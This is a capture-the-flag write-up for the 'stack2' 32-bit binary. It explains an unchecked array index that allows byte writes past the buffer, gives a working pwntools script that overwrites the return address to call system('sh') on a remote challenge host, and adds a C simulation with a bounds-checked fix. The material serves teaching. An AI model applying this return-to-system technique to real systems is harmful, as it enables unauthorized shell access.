pwn stack2

Open the binary in 32-bit IDA and take a rough look. The program lets you save some numbers, then display them, add more numbers, change one, and so on. From this challenge I learned a new and better hidden class of bug: array out-of-bounds access.
Look at option 3 (change a number). Although v13 is declared with 100 elements, the index v5 is never checked against that size, so the one-byte write lands wherever we say, including past the end of the 100 elements. We can use this to overwrite the saved return address and anything else on the stack above the array.
The hackhere function cannot be used here, but the binary does call system, so all we need is a "sh" string in the binary and a way to pass its address to system.
Next, find where the first element of v13 is stored. var_88 receives the first number we input, and it is ultimately stored at the address held in eax. Debug with gdb: set a breakpoint at 0x080486d5, run, and see what eax holds at that point.
Type b *0x080486d5, r, then 1 and 1 in turn (one number, with value 1).

eax holds 0xffffcfc8 at the breakpoint, so that is the address of v13[0]. Now look at the return address.
By the end of main, esp has moved back up to the top of the frame: when main executes ret, esp points to the saved return address.
This time set the breakpoint at 0x080488f2, the end of the function.

esp is 0xffffd04c there. Subtracting the array address 0xffffcfc8 gives 0x84, so the saved return address starts at index 0x84 of the array.
The exploit code is as follows:

from pwn import *

sh = remote('111.198.29.45', 39250)

def send_num(idx, num):
    # option 3 ("change number") writes one byte to v13[idx] with no bounds check
    sh.sendlineafter("5. exit", "3")
    sh.sendlineafter("which number to change:", str(idx))
    sh.sendlineafter("new number:", str(num))

sh.sendlineafter("How many numbers you have:", "1")
sh.sendlineafter("Give me your numbers", "1")

# v13 + 0x84 is the saved return address of main: overwrite it with
# the address of system (0x08048450), one byte at a time, little-endian
send_num(0x84, 0x50)
send_num(0x85, 0x84)
send_num(0x86, 0x04)
send_num(0x87, 0x08)
# 0x88..0x8b is the slot system will use as its own return address; leave it alone.
# Note that the argument goes at 0x8c, not 0x88.
send_num(0x8c, 0x87)   # address of the "sh" string (0x08048987) = system's first argument
send_num(0x8d, 0x89)
send_num(0x8e, 0x04)
send_num(0x8f, 0x08)

sh.sendline("5")   # exit: main returns into system("sh")
sh.interactive()

Index 0x84 is the first byte of the saved return address, so we write the address of system, 0x08048450, there byte by byte in little-endian order. The next four bytes (0x88 to 0x8b) are what system will treat as its own return address, and we do not care where it goes afterwards, so they are left untouched. At 0x8c we write 0x08048987, the address of the "sh" string, which becomes the first argument to system.
flag : Cyberpeace{1ba810e17403a9004cd8a5997c5eb110}
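To make the layout concrete, here is an added C model of the bug and of the fake frame the exploit builds. It is not code from the challenge binary or from the original post: the frame is a flat byte buffer whose size (0x90) is my assumption, the addresses are the ones observed in gdb above, and no real memory corruption takes place. It shows the unchecked write of option 3 beside a bounds-checked version, the index arithmetic (esp at ret minus the array base), and the little-endian byte writes that place system and the "sh" pointer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses observed in gdb in the write-up above. */
#define ARRAY_BASE 0xffffcfc8u   /* eax at 0x080486d5: where v13[0] lives   */
#define RET_SLOT   0xffffd04cu   /* esp at 0x080488f2: saved return address */
#define NUM_SLOTS  100u          /* v13 is declared with 100 elements       */
#define FRAME_SIZE 0x90u         /* assumption: model frame holding ret + 8 bytes */

#define SYSTEM_ADDR 0x08048450u  /* system() in the binary      */
#define SH_ADDR     0x08048987u  /* address of the "sh" string  */

enum { WRITE_OK = 0, WRITE_OUT_OF_RANGE = -1 };

/* Simulated stack frame: v13 starts at offset 0, the saved return address sits
 * at offset RET_SLOT - ARRAY_BASE. This is a plain buffer, not a real stack. */
static uint8_t g_frame[FRAME_SIZE];

/* Option 3 as the binary implements it: the index is never compared to NUM_SLOTS. */
static int change_number_vuln(uint8_t *frame, unsigned idx, uint8_t value) {
    frame[idx] = value;
    return WRITE_OK;
}

/* Hardened form of the same operation. */
static int change_number_safe(uint8_t *frame, unsigned idx, uint8_t value) {
    if (idx >= NUM_SLOTS)
        return WRITE_OUT_OF_RANGE;
    frame[idx] = value;
    return WRITE_OK;
}

/* Index of the saved return address, computed the way the write-up does. */
static unsigned ret_index(void) {
    return RET_SLOT - ARRAY_BASE;     /* 0x84 */
}

/* Write a 32-bit value little-endian through the one-byte-at-a-time primitive. */
static void write_dword(uint8_t *frame, unsigned idx, uint32_t value) {
    for (unsigned i = 0; i < 4; i++)
        change_number_vuln(frame, idx + i, (uint8_t)(value >> (8 * i)));
}

static uint32_t read_dword(const uint8_t *frame, unsigned idx) {
    return (uint32_t)frame[idx]
         | (uint32_t)frame[idx + 1] << 8
         | (uint32_t)frame[idx + 2] << 16
         | (uint32_t)frame[idx + 3] << 24;
}

/* Fake frame the exploit leaves behind: [system][untouched ret][&"sh"]. */
static void build_exploit_frame(uint8_t *frame) {
    unsigned ret = ret_index();
    memset(frame, 0, FRAME_SIZE);
    write_dword(frame, ret, SYSTEM_ADDR);   /* main's ret jumps into system     */
    /* ret+4..ret+7: the return address system would use; deliberately left alone */
    write_dword(frame, ret + 8, SH_ADDR);   /* system's first argument           */
}

/* Helpers for checking the model: build the frame, then read it back. */
static uint32_t exploit_dword_at(unsigned idx) {
    build_exploit_frame(g_frame);
    return read_dword(g_frame, idx);
}

static unsigned exploit_byte_at(unsigned idx) {
    build_exploit_frame(g_frame);
    return g_frame[idx];
}

/* Whether the hardened version lets a write at idx through. */
static int safe_write_accepts(unsigned idx) {
    return change_number_safe(g_frame, idx, 0) == WRITE_OK;
}

int main(void) {
    build_exploit_frame(g_frame);
    printf("return address index: 0x%x\n", ret_index());
    for (unsigned i = ret_index(); i < ret_index() + 12; i++)
        printf("v13[0x%02x] = 0x%02x\n", i, g_frame[i]);
    printf("hardened write at 0x84 accepted: %d\n", safe_write_accepts(0x84));
    return 0;
}
```

The eight send_num calls in the script are exactly the bytes write_dword emits for the two addresses; the bounds check in change_number_safe is the one-line fix that would have closed the bug.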

Origin blog.csdn.net/weixin_45677731/article/details/104868116